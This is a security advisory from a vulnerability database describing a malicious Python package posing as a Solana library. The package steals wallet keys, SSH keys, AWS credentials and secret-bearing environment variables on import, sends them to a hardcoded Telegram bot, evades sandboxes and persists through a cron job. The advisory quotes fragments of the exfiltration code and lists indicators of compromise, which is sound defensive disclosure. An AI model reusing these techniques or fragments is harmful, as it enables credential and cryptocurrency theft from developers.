VDB

GCVE-110-OSM-2026-95

GCVE-110-OSM-2026-95
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 9, 2026
This package is a credential-theft and persistence implant masquerading as a Solana Web3 library. On import, `__init__.py` immediately collects Solana wallet keys (`~/.solana/id.json`, `~/.config/solana/id.json`), SSH private keys, AWS credentials, `.env` files, and environment variables matching patterns like KEY, SECRET, MNEMONIC, PRIVATE, TOKEN, then exfiltrates them via a hardcoded Telegram bot token (`8870595195:AAHcwv2ZMYZU9ia_xjHGR5veBQTQ1FH_rOY`) to chat ID `8346336575`. The package also includes a sandbox-evasion check (`_sandbox()`) that detects Docker and strace before proceeding, and installs a `@reboot` cron job pointing to itself via `/tmp/.psync` for persistence. The attacker model is a supply-chain campaign targeting Solana developers to steal wallet mnemonics and private keys. Entrypoint: solana-web3/__init__.py (module-import: 50) Exfil: 8870595195:AAHcwv2ZMYZU9ia_xjHGR5veBQTQ1FH_rOY (telegram-bot, recovery: plaintext in solana-web3/__init__.py) Payload: solana-web3/__init__.py Key findings: - Shell Command Execution in solana-web3/__init__.py: "subprocess.run(" - Python File Upload to Remote in solana-web3/__init__.py: "urllib.request.Request(f'https://api.telegram.org/bot{BT}/{m}',data=" - System Information Exfiltration in solana-web3/__init__.py: "os.getcwd();W=os.name=='nt' BT='8870595195:AAHcwv2ZMYZU9ia_xjHGR5veBQTQ1FH_rOY' ..." - HTTP Data Exfiltration in solana-web3/__init__.py: "os.getcwd();W=os.name=='nt' BT='8870595195:AAHcwv2ZMYZU9ia_xjHGR5veBQTQ1FH_rOY' ..." - Data Encoding for Exfiltration in solana-web3/__init__.py: "json.dumps(d).encode" IOCs: - telegramBots: 8870595195:AAHcwv2ZMYZU9ia_xjHGR5veBQTQ1FH_rOY - telegramApi: api.telegram.org/bot{BT}/{m} - payloadFileHash: 96f8547a8b1ef16709dab07b25ab278bd2a547fa1ca956ffff0eb19269cb0f44

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownchain-coremeshall (affected)
unknown@emilgroup/document-sdk-nodeall (affected), all (affected), all (affected), * (affected), * (affected), all (affected)
unknownsolana-web3all (affected)
unknown@modals/layoutall (affected)
unknowntransform-for-of* (affected), all (affected), all (affected), all (affected), all (affected), all (affected), all (affected), all (affected)

References

advisory
vendor
advisory
vendor
advisory
vendor
advisory
vendor
advisory
vendor

Browse GCVE Records

73,040 records in the GCVE database · Updated July 15, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›